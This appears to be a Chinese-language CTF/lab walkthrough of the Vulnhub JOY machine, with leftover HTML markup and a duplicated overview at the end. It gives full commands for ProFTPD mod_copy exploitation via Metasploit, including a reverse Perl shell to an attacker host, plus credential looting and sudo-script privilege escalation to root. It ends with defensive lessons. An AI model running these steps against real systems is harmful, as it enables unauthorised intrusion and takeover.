Vulnhub靶机digitalworld.local-JOY渗透测试实战教学<\/h1>

靶机概述<\/h2>
本教学文档基于Vulnhub的digitalworld.local-JOY靶机，重点讲解通过SNMP信息泄露、ProFTPD漏洞利用和权限提升的完整渗透测试流程。该靶机运行多种服务，包括FTP、SSH、SMTP、HTTP等，最终目标是获取root权限。<\/p>

信息收集阶段<\/h2>

初始扫描<\/h3>

使用Nmap进行全端口扫描，发现开放以下TCP端口：<\/p>

21\/tcp - FTP (ProFTPD)
22\/tcp - SSH (Dropbear sshd 0.34)
25\/tcp - SMTP (Postfix)
80\/tcp - HTTP (Apache 2.4.25)
110\/tcp - POP3 (Dovecot)
139,445\/tcp - Samba (Samba 4.5.12-Debian)
143\/tcp - IMAP (Dovecot)
465,587\/tcp - SMTP over SSL
993\/tcp - IMAP over SSL
995\/tcp - POP3 over SSL
<\/code><\/pre>
扫描命令：<\/p>
nmap -p- 192.168.101.150 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>服务详情分析<\/h3>


FTP服务(21\/tcp)<\/strong>：<\/p>

ProFTPD服务<\/li>
允许匿名登录<\/li>
存在download和upload两个目录<\/li>
<\/ul>
<\/li>

SMB服务(139,445\/tcp)<\/strong>：<\/p>

Samba 4.5.12-Debian<\/li>
操作系统伪装为Windows 6.1<\/li>
计算机名：joy<\/li>
消息签名启用但不强制<\/li>
<\/ul>
<\/li>

SNMP服务(UDP扫描发现)<\/strong>：<\/p>
sudo nmap -Pn -sU -A --top-ports=<\/span>20<\/span> -v 192.168.101.150
<\/span><\/span><\/code><\/pre>
泄露了大量关于运行服务的信息<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用阶段<\/h2>
FTP匿名访问利用<\/h3>


匿名登录FTP：<\/p>
ftp 192.168.101.150
<\/span><\/span><\/code><\/pre>用户名：anonymous，密码可为空<\/p>
<\/li>

查看目录结构：<\/p>
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
<\/code><\/pre>
<\/li>

下载文件：<\/p>
ftp> cd download
ftp> get directory
<\/code><\/pre>
<\/li>
<\/ol>
ProFTPD漏洞利用<\/h3>


通过TFTP获取版本信息：<\/p>
tftp 192.168.101.150 36969<\/span>
<\/span><\/span>get version_control
<\/span><\/span><\/code><\/pre>确认ProFTPD版本为1.3.5<\/p>
<\/li>

使用Metasploit利用ProFTPD的mod_copy模块漏洞：<\/p>
msfconsole
<\/span><\/span>use exploit\/unix\/ftp\/proftpd_modcopy_exec
<\/span><\/span>set RHOSTS 192.168.101.150
<\/span><\/span>set payload cmd\/unix\/reverse_perl
<\/span><\/span>set LHOST 192.168.101.128
<\/span><\/span>set SITEPATH \/var\/www\/tryingharderisjoy
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>

成功获取www-data权限的shell后，查找敏感信息：<\/p>
cat \/var\/www\/tryingharderisjoy\/ossec\/patricksecretsofjoy
<\/span><\/span><\/code><\/pre>发现用户patrick的凭据：patrick:apollo098765<\/p>
<\/li>

切换至patrick用户：<\/p>
su patrick
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
权限提升阶段<\/h2>
检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现patrick用户对\/home\/patrick\/script\/目录下的脚本有sudo权限<\/p>
利用FTP和ProFTPD特性提权<\/h3>


创建恶意脚本：<\/p>
echo '\/bin\/bash'<\/span> > test
<\/span><\/span><\/code><\/pre><\/li>

通过FTP上传：<\/p>
ftp 192.168.101.150
<\/span><\/span>cd upload
<\/span><\/span>put test
<\/span><\/span><\/code><\/pre><\/li>

使用ProFTPD的SITE CPFR\/CPTO命令复制文件：<\/p>
telnet 192.168.101.150 21<\/span>
<\/span><\/span>site cpfr \/home\/ftp\/upload\/test
<\/span><\/span>site cpto \/home\/patrick\/script\/test
<\/span><\/span><\/code><\/pre><\/li>

执行脚本获取root权限：<\/p>
sudo \/home\/patrick\/script\/test
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
关键安全教训<\/h2>


匿名FTP访问<\/strong>：匿名FTP访问可能导致敏感信息泄露，应禁用或严格限制<\/p>
<\/li>

ProFTPD配置风险<\/strong>：<\/p>

不应允许未经认证的用户使用SITE CPFR\/CPTO命令<\/li>
应及时更新ProFTPD到最新版本<\/li>
<\/ul>
<\/li>

sudo权限配置错误<\/strong>：<\/p>

不应授予用户对可写脚本的sudo权限<\/li>
应遵循最小权限原则<\/li>
<\/ul>
<\/li>

SNMP信息泄露<\/strong>：应配置SNMP社区字符串为强密码，限制访问<\/p>
<\/li>

凭证存储不安全<\/strong>：不应将用户凭据以明文形式存储在web目录中<\/p>
<\/li>
<\/ol>
防御建议<\/h2>

定期更新所有服务软件到最新版本<\/li>
禁用不必要的服务和匿名访问<\/li>
实施严格的sudo权限管理<\/li>
监控和审计系统日志，特别是特权操作<\/li>
对敏感信息进行加密存储<\/li>
配置防火墙规则，限制对管理服务的访问<\/li>
<\/ol>
通过本教学，我们展示了从信息收集到权限提升的完整渗透测试流程，强调了配置错误和过时软件带来的安全风险。<\/p>

Vulnhub靶机digitalworld.local-JOY渗透测试实战教学<\/h1>

靶机概述<\/h2> 本教学文档基于Vulnhub的digitalworld.local-JOY靶机，重点讲解通过SNMP信息泄露、ProFTPD漏洞利用和权限提升的完整渗透测试流程。该靶机运行多种服务，包括FTP、SSH、SMTP、HTTP等，最终目标是获取root权限。<\/p>

信息收集阶段<\/h2>

漏洞利用阶段<\/h2>

权限提升阶段<\/h2>

靶机概述<\/h2>
本教学文档基于Vulnhub的digitalworld.local-JOY靶机，重点讲解通过SNMP信息泄露、ProFTPD漏洞利用和权限提升的完整渗透测试流程。该靶机运行多种服务，包括FTP、SSH、SMTP、HTTP等，最终目标是获取root权限。<\/p>